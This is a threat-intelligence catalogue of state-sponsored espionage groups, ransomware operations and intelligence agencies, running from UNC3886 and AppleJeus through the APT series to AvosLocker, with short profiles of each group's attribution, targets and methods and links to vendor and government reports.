UNC3886 is a China-nexus cyberespionage group that has been active since at least 2022, targeting defense, technology, and telecommunication organizations located in the United States and the Asia-Pacific-Japan (APJ) regions. UNC3886 has displayed a deep understanding of edge devices and virtualization technologies through the exploitation of zero-day vulnerabilities and the use of novel malware families and utilities. [Mandiant Fortinet Zero Day](https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem) [Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023](https://cloud.google.com/blog/topics/threat-intelligence/vmware-esxi-zero-day-bypass/)

AppleJeus

AppleJeus is a North Korean state-sponsored threat group attributed to the Reconnaissance General Bureau. Associated with the broader Lazarus Group umbrella of actors, AppleJeus has been active since at least 2018 and is closely aligned in resources with TEMP.hermit, another DPRK-affiliated group under the same umbrella. [dtex DPRK 2025 structure ITworkers](https://reports.dtexsystems.com/DTEX-Exposing+DPRK+Cyber+Syndicate+and+Hidden+IT+Workforce.pdf) The group's primary mission is to generate and launder revenue to provide financial support to the government. AppleJeus primarily targets the cryptocurrency industry and is most notably responsible for the 3CX Supply Chain Attack. [Mandiant 3cx UNC4736 2023](https://cloud.google.com/blog/topics/threat-intelligence/3cx-software-supply-chain-compromise/) The group traditionally deploys malicious cryptocurrency software in combination with phishing. From these compromised environments, it selectively deploys additional backdoors to enable extended operations against high-value financial targets. [Mandiant DPRK Groups 2023](https://cloud.google.com/blog/topics/threat-intelligence/north-korea-cyber-structure-alignment-2023) [JPCert Blog Laz Subgroups 2025](https://blogs.jpcert.or.jp/en/2025/03/classifying-lazaruss-subgroup.html)

Water Galura

Water Galura are the operators of the Qilin Ransomware-as-a-Service (RaaS) who handle payload generation, ransom negotiations, and the publication of stolen data for Qilin affiliates recruited on Russian cybercrime forums. Water Galura have been active since at least 2022 and use a double extortion model in which they demand payment both for providing decryption keys and for refraining from publishing the stolen data to their leak site. [BushidoToken Qilin RaaS JUN 2024](https://blog.bushidotoken.net/2024/06/tracking-adversaries-qilin-raas.html) [Sophos Qilin MSP APR 2025](https://news.sophos.com/en-us/2025/04/01/sophos-mdr-tracks-ongoing-campaign-by-qilin-affiliates-targeting-screenconnect/)

Medusa Group

Medusa Group has been active since at least 2021 and was initially operated as a closed ransomware group before evolving into a Ransomware-as-a-Service (RaaS) operation. Some reporting indicates that certain attacks may still be conducted directly by the ransomware’s core developers. Public sources have also referred to the group as “Spearwing” or “Medusa Actors.” [CISA Medusa Group Medusa Ransomware March 2025](https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a) [Broadcom Medusa Ransomware Medusa Group March 2025](https://www.security.com/threat-intelligence/medusa-ransomware-attacks) Medusa Group employs living-off-the-land techniques, frequently leveraging publicly available tools and common remote management software to conduct operations. The group engages in double extortion tactics, exfiltrating data prior to encryption and threatening to publish stolen information if ransom demands are not met. [Security Scorecard Medusa Ransomware January 2024](https://securityscorecard.com/wp-content/uploads/2024/01/deep-dive-into-medusa-ransomware.pdf) For initial access, Medusa Group has exploited publicly known vulnerabilities, conducted phishing campaigns, and used credentials or access purchased from Initial Access Brokers (IABs). The group is opportunistic and has targeted a wide range of sectors globally. [Intel471 Medusa Ransomware May 2025](https://www.intel471.com/blog/threat-hunting-case-study-medusa-ransomware)

Contagious Interview

Contagious Interview is a North Korea–aligned threat group active since 2023. The group conducts both cyberespionage and financially motivated operations, including the theft of cryptocurrency and user credentials. Contagious Interview targets Windows, Linux, and macOS systems, with a particular focus on individuals engaged in software development and cryptocurrency-related activities. [Validin Contagious Interview North Korea ClickFix January 2025](https://www.validin.com/blog/inoculating_contagious_interview_with_validin/) [Esentire ContagiousInterview BeaverTail InvisibleFerret November 2024](https://www.esentire.com/blog/bored-beavertail-invisibleferret-yacht-club-a-lazarus-lure-pt-2) [Datadog Contagious Interview Tenacious Pungsan October 2024](https://securitylabs.datadoghq.com/articles/tenacious-pungsan-dprk-threat-actor-contagious-interview/) [Recorded Future Contagious Interview BeaverTail InvisibleFerret OtterCookie February 2025](https://www.recordedfuture.com/research/inside-the-scam-north-koreas-it-worker-threat) [ESET Contagious Interview BeaverTail InvisibleFerret February 2025](https://www.welivesecurity.com/en/eset-research/deceptivedevelopment-targets-freelance-developers/) [Zscaler ContagiousInterview BeaverTail InvisibleFerret November 2024](https://www.zscaler.com/blogs/security-research/pyongyang-your-payroll-rise-north-korean-remote-workers-west) [PaloAlto ContagiousInterview BeaverTail InvisibleFerret November 2023](https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/) [PaloAlto Unit42 ContagiousInterview BeaverTail InvisibleFerret October 2024](https://unit42.paloaltonetworks.com/north-korean-threat-actors-lure-tech-job-seekers-as-fake-recruiters/)

Storm-0501

Storm-0501 is a financially motivated cyber criminal group that uses commodity and open-source tools to conduct ransomware operations. Storm-0501 has been active since 2021 and has previously been affiliated with Sabbath Ransomware and other Ransomware-as-a-Service (RaaS) variants such as Hive, BlackCat, Hunters International, LockBit 3.0, and Embargo ransomware. [Avertium Storm-0501 Sabbath Ransomware Arcane January 2022](https://www.avertium.com/resources/threat-reports/in-depth-look-at-sabbath-ransomware-gang) [Microsoft Storm-501 Sabbath Ransomware Embargo September 2024](https://www.microsoft.com/en-us/security/blog/2024/09/26/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/) [Microsoft Storm-0501 Embargo Ransomware August 2025](https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/) [Google Mandiant Storm-0501 Sabbath Ransomware November 2021](https://cloud.google.com/blog/topics/threat-intelligence/sabbath-ransomware-affiliate/)

APT14

PLA Navy Anchor Panda is an adversary that CrowdStrike has tracked extensively over the last year targeting both civilian and military maritime operations in the green/brown water regions primarily in the area of operations of the South Sea Fleet of the PLA Navy. In addition to maritime operations in this region, Anchor Panda also heavily targeted western companies in the US, Germany, Sweden, the UK, and Australia, and other countries involved in maritime satellite systems, aerospace companies, and defense contractors. Not surprisingly, embassies and diplomatic missions in the region, foreign intelligence services, and foreign governments with space programs were also targeted.

APT15

This threat actor uses phishing techniques to compromise the networks of foreign ministries of European countries for espionage purposes.

APT2

Putter Panda were the subject of an extensive report by CrowdStrike, which stated: 'The CrowdStrike Intelligence team has been tracking this particular unit since 2012, under the codename PUTTER PANDA, and has documented activity dating back to 2007. The report identifies Chen Ping, aka cpyy, and the primary location of Unit 61486.'

APT20

We’ve uncovered some new data and likely attribution regarding a series of APT watering hole attacks this past summer. Watering hole attacks are an increasingly popular component of APT campaigns, as many people are more aware of spear phishing and are less likely to open documents or click on links in unsolicited emails. Watering hole attacks offer a much better chance of success because they involve compromising legitimate websites and installing malware intended to compromise website visitors. These are often popular websites frequented by people who work in specific industries or have political sympathies to which the actors want to gain access. In contrast to many other APT campaigns, which tend to rely heavily on spear phishing to gain victims, “th3bug” is known for compromising legitimate websites their intended visitors are likely to frequent. Over the summer they compromised several sites, including a well-known Uyghur website written in that native language.

APT21

APT21 is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

APT22

Suckfly is a China-based threat group that has been active since at least 2014.

APT23

TrendMicro described Tropic Trooper in a 2015 report as: 'Taiwan and the Philippines have become the targets of an ongoing campaign called Operation TropicTrooper. Active since 2012, the attackers behind the campaign have set their sights on the Taiwanese government as well as a number of companies in the heavy industry. The same campaign has also targeted key Philippine military agencies.'

APT24

The Pitty Tiger group has been active since at least 2011. They have been seen using the Heartbleed vulnerability to directly obtain valid credentials.

APT26

Microsoft threat actor profile. Origin/Threat: China.

APT27

A China-based actor that targets foreign embassies to collect data on government, defence, and technology sectors.

APT28

APT28 is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165. [NSA/FBI Drovorub August 2020](https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF) [Cybersecurity Advisory GRU Brute Force Campaign July 2021](https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF) This group has been active since at least 2004. [DOJ GRU Indictment Jul 2018](https://cdn.cnn.com/cnn/2018/images/07/13/gru.indictment.pdf) [Ars Technica GRU indictment Jul 2018](https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/) [Crowdstrike DNC June 2016](https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/) [FireEye APT28](https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf) [SecureWorks TG-4127](https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign) [FireEye APT28 January 2017](https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf) [GRIZZLY STEPPE JAR](https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf) [Sofacy DealersChoice](https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/) [Palo Alto Sofacy 06-2018](https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/) [Symantec APT28 Oct 2018](https://www.symantec.com/blogs/election-security/apt28-espionage-military-government) [ESET Zebrocy May 2019](https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/) APT28 reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. [Crowdstrike DNC June 2016](https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/) In 2018, the US indicted five GRU Unit 26165 officers associated with APT28 for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations. [US District Court Indictment GRU Oct 2018](https://www.justice.gov/opa/page/file/1098481/download) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as Sandworm Team.

APT29

APT29 is a threat group that has been attributed to Russia's Foreign Intelligence Service (SVR). [White House Imposing Costs RU Gov April 2021](https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/) [UK Gov Malign RIS Activity April 2021](https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services) They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. APT29 reportedly compromised the Democratic National Committee starting in the summer of 2015. [F-Secure The Dukes](https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf) [GRIZZLY STEPPE JAR](https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf) [Crowdstrike DNC June 2016](https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/) [UK Gov UK Exposes Russia SolarWinds April 2021](https://www.gov.uk/government/news/russia-uk-exposes-russian-involvement-in-solarwinds-cyber-compromise) In April 2021, the US and UK governments attributed the SolarWinds Compromise to the SVR; public statements included citations to APT29, Cozy Bear, and The Dukes. [NSA Joint Advisory SVR SolarWinds April 2021](https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF) [UK NSCS Russia SolarWinds April 2021](https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise) Industry reporting also referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, Dark Halo, and SolarStorm. [FireEye SUNBURST Backdoor December 2020](https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html) [MSTIC NOBELIUM Mar 2021](https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/) [CrowdStrike SUNSPOT Implant January 2021](https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/) [Volexity SolarWinds](https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/) [Cybersecurity Advisory SVR TTP May 2021](https://www.ncsc.gov.uk/files/Advisory-further-TTPs-associated-with-SVR-cyber-actors.pdf) [Unit 42 SolarStorm December 2020](https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline/)

APT31

FireEye characterizes APT31 as an actor specialized in intellectual property theft, focusing on data and projects that make a particular organization competitive in its field. Based on available data (April 2016), FireEye assesses that APT31 conducts network operations at the behest of the Chinese Government. According to CrowdStrike, this adversary is also suspected of continuing to target upstream providers (e.g., law firms and managed service providers) to support additional intrusions against high-profile assets. In 2018, CrowdStrike observed this adversary using spear-phishing, URL “web bugs” and scheduled tasks to automate credential harvesting.

APT32

APT32 is a suspected Vietnam-based threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as foreign governments, dissidents, and journalists with a strong focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia. They have extensively used strategic web compromises to target victims. [FireEye APT32 May 2017](https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html) [Volexity OceanLotus Nov 2017](https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/) [ESET OceanLotus](https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/)

APT34

OilRig is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. The group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests. [FireEye APT34 Dec 2017](https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html) [Palo Alto OilRig April 2017](http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/) [ClearSky OilRig Jan 2017](http://www.clearskysec.com/oilrig/) [Palo Alto OilRig May 2016](http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/) [Palo Alto OilRig Oct 2016](http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/) [Unit42 OilRig Playbook 2023](https://pan-unit42.github.io/playbook_viewer/?pb=evasive-serpens) [Unit 42 QUADAGENT July 2018](https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/)

APT35

Magic Hound is an Iranian-sponsored threat group that conducts long-term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted European, U.S., and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014. [FireEye APT35 2018](https://static.carahsoft.com/concrete/files/1015/2779/3571/M-Trends-2018-Report.pdf) [ClearSky Kittens Back 3 August 2020](https://www.clearskysec.com/wp-content/uploads/2020/08/The-Kittens-are-Back-in-Town-3.pdf) [Certfa Charming Kitten January 2021](https://blog.certfa.com/posts/charming-kitten-christmas-gift/) [Secureworks COBALT ILLUSION Threat Profile](https://www.secureworks.com/research/threat-profiles/cobalt-illusion) [Proofpoint TA453 July 2021](https://www.proofpoint.com/us/blog/threat-insight/operation-spoofedscholars-conversation-ta453)

APT4

Sodium is reportedly a "sophisticated Chinese state-affiliated" threat actor group, which has especially targeted defense, government, and high-tech organizations in the United States. [[GitHub cybershujin Threat-Actors-use-of-Artifical-Intelligence](/references/b595af7e-ff84-49fa-8e07-cd2abe9e1d65)]

APT40

Leviathan is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Security's (MSS) Hainan State Security Department and an affiliated front company. [CISA AA21-200A APT40 July 2021](https://us-cert.cisa.gov/ncas/alerts/aa21-200a) Active since at least 2009, Leviathan has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Australia, Europe, the Middle East, and Southeast Asia. [CISA AA21-200A APT40 July 2021](https://us-cert.cisa.gov/ncas/alerts/aa21-200a) [Proofpoint Leviathan Oct 2017](https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets) [FireEye Periscope March 2018](https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html) [CISA Leviathan 2024](https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-190a)

APT41

APT41 is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, APT41 has been observed targeting various industries, including but not limited to the healthcare, telecom, technology, finance, education, retail and video game industries in 14 countries. [apt41_mandiant](https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf) Notable behaviors include using a wide range of malware and tools to complete mission objectives. APT41 overlaps at least partially with public reporting on groups including BARIUM and Winnti Group. [FireEye APT41 Aug 2019](https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf) [Group IB APT 41 June 2021](https://www.group-ib.com/blog/colunmtk-apt41/)

APT42 (Deprecated)

*We are no longer maintaining this object in favor of a similar object subsequently published by MITRE: "APT42" (Group). All relevant Tidal content extensions (e.g. additional Technique and Object relationships and metadata) have been added to the MITRE-authored object.* APT42 is an Iranian state-sponsored espionage group believed to operate on behalf of the Islamic Revolutionary Guard Corps (IRGC) Intelligence Organization (IRGC-IO). APT42 primarily focuses on collecting information on and surveilling its targets, mainly individuals and organizations with strategic significance to Iran's government. The group's operations are characterized by targeted spear-phishing attacks and surveillance activity. Mandiant researchers acknowledged overlaps between APT42 and APT35, which both likely operate on behalf of the IRGC, but noted that the groups display "substantial differences" in targeting patterns and TTPs. [[Mandiant Crooked Charms August 12 2022](/references/53bab956-be5b-4d8d-b553-9926bc5d9fee)]

APT43

• APT43 is a prolific cyber operator that supports the interests of the North Korean regime. The group combines moderately-sophisticated technical capabilities with aggressive social engineering tactics, especially against South Korean and U.S.-based government organizations, academics, and think tanks focused on Korean peninsula geopolitical issues.
• In addition to its espionage campaigns, we believe APT43 funds itself through cybercrime operations to support its primary mission of collecting strategic intelligence.
• The group creates numerous spoofed and fraudulent personas for use in social engineering, as well as cover identities for purchasing operational tooling and infrastructure.
• APT43 has collaborated with other North Korean espionage operators on multiple operations, underscoring the major role APT43 plays in the regime’s cyber apparatus.

APT45

APT45 is a North Korean cyber threat actor that has been active since at least 2009. They have conducted espionage campaigns targeting government agencies and defense industries, as well as financially-motivated operations, including ransomware development. APT45 has targeted critical infrastructure, financial organizations, nuclear research facilities, and healthcare and pharmaceutical companies. They use a mix of publicly available tools, modified malware, and custom malware families in their operations.

APT6

The FBI issued a rare bulletin admitting that a group named Advanced Persistent Threat 6 (APT6) hacked into US government computer systems as far back as 2011 and for years stole sensitive data. The FBI alert was issued in February and went largely unnoticed. Nearly a month later, security experts are now shining a bright light on the alert and the mysterious group behind the attack. “This is a rare alert and a little late, but one that is welcomed by all security vendors as it offers a chance to mitigate their customers and also collaborate further in what appears to be an ongoing FBI investigation,” said Deepen Desai, director of security research at the security firm Zscaler, in an email to Threatpost. Details regarding the actual attack and which government systems were infected are scant. Government officials said they knew the initial attack occurred in 2011, but are unaware of who specifically is behind the attacks. “Given the nature of malware payload involved and the duration of this compromise being unnoticed – the scope of lateral movement inside the compromised network is very high possibly exposing all the critical systems,” Deepen said.

APT73

APT73 is a ransomware group that has publicly identified 12 victims and launched its data leak site on April 25th. The DLS bears a striking resemblance to that of LockBit, likely to leverage LockBit's reputation and attract potential affiliates. The rationale for this design mimicry is unclear, but it may be intended to signal operational parity with LockBit to inspire trust among low-level criminals. APT73 was formed by an alleged former LockBit affiliate following law enforcement's "Operation Cronos" in February 2024.

APT9

APT9 engages in cyber operations where the goal is data theft, usually focusing on the data and projects that make a particular organization competitive within its field. APT9 was historically very active in the pharmaceuticals and biotechnology industry. We have observed this actor use spearphishing, valid accounts, as well as remote services for Initial Access. On at least one occasion, Mandiant observed APT9 at two companies in the biotechnology industry and suspects that APT9 actors may have gained initial access to one of the companies by using a trusted relationship between the two companies. APT9 uses a wide range of backdoors, including publicly available backdoors, as well as backdoors that are believed to be custom but are used by multiple APT groups.

APTIran

APTIran has claimed responsibility for a large-scale campaign targeting Israeli critical infrastructure, asserting infiltration of government ministries, hospitals, universities, and financial institutions as retaliation for Israeli military operations. The group has leaked over 350,000 Israeli government login credentials and approximately 300 internal databases, while also threatening to create a 'zombie' network from infected devices. They have reportedly deployed ransomware strains such as ALPHV and LockBit as part of their offensive toolkit. Additionally, APTIran has made unverified claims of compromising Israeli water control systems and the state-owned food security agency Jordan Silos and Supply General Co.

aptlock

Aptlock surfaced in early 2025 and is characterized by a single-extortion model combined with threats of data leakage. The ransomware encrypts files on Windows systems, appending the extension .aptlock, and then changes the victim’s desktop wallpaper. Victims receive a ransom note named read_me_to_access.txt informing them that their critical company data has been exfiltrated and will be deleted or leaked if they don’t act. They are given 72 hours to initiate contact via Tor-based chat access (using credentials provided in the note), with further warnings issued if no engagement occurs within 5 days. Specific details about intrusion vectors, encryption algorithms used, or known affiliate operators remain undisclosed in public threat intelligence. No reliable evidence links Aptlock to Ransomware-as-a-Service operations or lists any known affiliates.

Arachna Leak

Arachna Leak is an active extortion or ransomware group tracked by RansomLook.

arcane

Arcane first emerged in mid-2021 under the UNC2190 cluster and later rebranded as Sabbath, continuing its operations against critical infrastructure like hospitals, schools, and educational entities. It follows a double-extortion model—encrypting data (using ROLLCOAST/Eruption malware) while also exfiltrating sensitive information and threatening to leak it. Victims have included institutions in the U.S. and Canada across sectors such as healthcare, education, and natural resources. Initial intrusion tactics involved deployment of Cobalt Strike with custom profiles, DLL-based in-memory execution, and signed TLS certificates, plus use of stealthy GET requests ending with “kitten.gif.” Specific encryption algorithms or file extensions have not been publicly confirmed. The group appears to operate in an affiliate-style model but remains under single management rather than a full RaaS platform.

ArcaneDoor

ArcaneDoor is a campaign that is the latest example of state-sponsored actors targeting perimeter network devices from multiple vendors. Coveted by these actors, perimeter network devices are the perfect intrusion point for espionage-focused campaigns. As a critical path for data into and out of the network, these devices need to be routinely and promptly patched; using up-to-date hardware and software versions and configurations; and be closely monitored from a security perspective. Gaining a foothold on these devices allows an actor to directly pivot into an organization, reroute or modify traffic and monitor network communications. In the past two years, we have seen a dramatic and sustained increase in the targeting of these devices in areas such as telecommunications providers and energy sector organizations — critical infrastructure entities that are likely strategic targets of interest for many foreign governments.

arcrypter

ArcRypt (also known as ARCrypter or ChileLocker) was first identified in August 2022, originally targeting government entities in Latin America and subsequently expanding globally. The group employs a single-extortion model—there is no evidence of a data-leak threat or RaaS ecosystem. The malware encrypts files using extensions such as .crypt, .crYpt, and .crYptA3, and uniquely drops the ransom note before commencing encryption. It has variants for both Windows and Linux, including a Go-based Linux version. Communication with victims occurs via Tor-based portals, evolving over time from a single shared site to individualized mirror sites for each victim. In some cases, threat actors have instructed victims to contact them using Tox, creating a Tox profile for communication. Targets have included Chile’s government infrastructure, Colombia’s Invima agency, and organizations in China and Canada.

Arcus Media

Arcus Media is an active extortion or ransomware group tracked by RansomLook.

Argonauts Group

Argonauts Group is an active extortion or ransomware group tracked by RansomLook.

Argus

Ransomware

AridViper

AridViper is a state-sponsored APT primarily targeting military personnel, journalists, and dissidents in the Middle East, with a focus on Israel and Palestine. The group employs custom-developed mobile malware, including variants like AridSpy, GnatSpy, and Micropsia, often delivered through spear-phishing emails and deceptive applications. Their operations involve sophisticated social engineering tactics, including the use of fake social media profiles and weaponized apps masquerading as legitimate services. AridViper's activities are characterized by a blend of technical sophistication and psychological manipulation, aiming to exfiltrate sensitive data from compromised systems.

Aris Locker

ransomware

Arkana Security

Arkana Security is an active extortion or ransomware group tracked by RansomLook.

Armage

Ransomware

ArmaLocky

Ransomware

Armed Forces Security Center (AFSC)

Armed Forces Security Center (AFSC)

Army Intelligence Center

Army Intelligence Center (Efterretningsregimentet (EFR)).

Army Intelligence Department

Army Intelligence Department (military intelligence)

Army Military Intelligence Command (AMIC)

Army Military Intelligence Command (AMIC)

Arsium

Ransomware

Arvinclub

Arvin Club is a popular ransomware group with a widespread Telegram presence, which includes personal group chats and official channels. The group recently launched its official Tor/onion website to update its status and release details of its latest attacks and data breaches. Its latest target is Kendriya Vidyalaya, a chain of schools in India. The group has exposed the Personally Identifiable Information (PII) of some students.

Aslan Neferler Tim

A Turkish nationalist hacktivist group that has been active for roughly one year. According to DomainTools, the group’s site has been registered since December 2015, with an active Twitter account since January 2016. The group carries out distributed denial-of-service (DDoS) attacks and defacements against the sites of news organizations and governments perceived to be critical of Turkey’s policies or leadership, and purports to act in defense of Islam.

ASN1 Encoder Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The attacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

Asnarök

Asnarök is a threat actor that exploited CVE-2020-12271 and used a command-injection privilege escalation to gain root access to devices and install the Asnarök Trojan. The actor demonstrated significant changes in TTPs, including the deployment of a web shell that did not reach out to an external C2 for commands. X-Ops identified a patient-zero device linked to the attack and observed the use of an IC.sh script that stole local user account data. The actor's activities were linked to a broader pattern of malicious exploit research and targeted vulnerabilities disclosed by bug bounty researchers.

Assembly

Ransomware

Assistant Attorney General's Office for Special Investigations on Organized Crime

Assistant Attorney General's Office for Special Investigations on Organized Crime (SEIDO / PGR)

astralocker

AstraLocker first appeared in 2021, likely as a fork of Babuk ransomware using leaked source code. It follows a single-extortion, smash-and-grab approach: it is distributed directly via phishing Microsoft Word documents containing embedded OLE objects. Once executed, it kills security and backup processes, deletes shadow copies, and encrypts files using modified HC-128 and Curve25519 algorithms, appending extensions like .Astra or .babyk. Being a smash-and-grab style attack, it is less methodical than more sophisticated campaigns, deploying ransomware immediately upon user action rather than conducting prolonged network reconnaissance. In mid-2022, the operator ceased ransomware operations, releasing decryptors and announcing a pivot to cryptojacking.

Astro Locker

Ransomware

Ataware

Ransomware

Atchbo

Ransomware

ATLAS

Ransomware

AtlasCross

NSFOCUS Security Labs recently discovered a new attack process based on phishing documents in their daily threat-hunting operations. Delving deeper into this finding through extensive research, they confirmed two new Trojan horse programs and many rare attack techniques and tactics. NSFOCUS Security Labs believes that this new attack process comes from a new APT attacker, who has a high technical level and a cautious attack attitude. The phishing attack activity captured this time is part of the attacker’s targeted strike on specific targets and is its main means to achieve in-domain penetration. NSFOCUS Security Labs validated the high-level threat attributes of AtlasCross in terms of development technology and attack strategy through an in-depth analysis of its attack indicators. At this current stage, AtlasCross has a relatively limited scope of activity, primarily focusing on targeted attacks against specific hosts within a network domain. However, the attack processes they employ are highly robust and mature. NSFOCUS Security Labs deduces that this attacker is highly likely to deploy this attack process into larger-scale network attack operations.

Atomsilo

AtomSilo is a new ransomware first seen in September 2021, during an attack that exploited a recently revealed vulnerability (CVE-2021-26084) in Atlassian’s Confluence collaboration software for initial access. The ransomware uses the double-extortion method, which is gaining popularity among ransomware threat actors: first they exfiltrate confidential information, and as a second step they encrypt the system's files.

Attor

Adversary group targeting diplomatic missions and governmental organisations.

Attorney General's Office of Indonesia

Deputy Attorney General on Intelligence (Under the Attorney General's Office) – Jaksa Agung Muda Bidang Intelijen Kejaksaan Agung

Audit Team

Audit Team is an active extortion or ransomware group tracked by RansomLook.

Aurora Ransomware

Aurora is a typical ransomware that extorts PC users. It encrypts files with a strong cipher and appends .aurora to the end of the file names, making the data impossible to open. It then drops six copies of the ransom note, all with the same demand: victims must write an email to anonimus.mr@yahoo.com and stay in contact until the criminals reply with the ransom amount.

Aurora

Aurora is an active extortion or ransomware group tracked by RansomLook.

Australian-AES

Ransomware

Australian Geospatial-Intelligence Organisation

Australian Geospatial-Intelligence Organisation (AGO)

Australian Secret Intelligence Service

Australian Secret Intelligence Service (ASIS)

Australian Security Intelligence Organisation

Australian Security Intelligence Organisation (ASIO)

Australian Signals Directorate

Australian Signals Directorate (ASD)

AutoEncryptor

Ransomware

AutoLocky

Ransomware

Automated Libra

Automated Libra is a South African-based freejacking group that primarily targets cloud platforms offering limited-time trials of cloud resources in order to perform their cryptomining operations.[[Sysdig October 25 2022](/references/177272f8-2701-4803-ab61-f64afa046127)][[Unit 42 December 5 2024](/references/bae298f0-71ac-4841-8670-1b805cc7f9dd)][[Free Trial PurpleUrchin](/references/841f397d-d103-56d7-9854-7ce43c684879)]

AutoWannaCryV2

Ransomware

Auuahk-Ouuohk

Ransomware

Avaddon

Avaddon is a ransomware malware targeting Windows systems often spread via malicious spam. The first known attack where Avaddon ransomware was distributed was in February 2020. Avaddon encrypts files using the extension .avdn and uses a TOR payment site for the ransom payment.

AvastVirusinfo Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The attacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc. PAYING RANSOM IS USELESS, YOUR FILES WILL NOT BE FIXED. THE DAMAGE IS PERMANENT!!!!

AVCrypt

Ransomware

Avivore

The group’s existence came to light during Context’s investigation of a number of attacks against multinational enterprises that compromise smaller engineering services and consultancies working in their supply chains.

AvosLocker

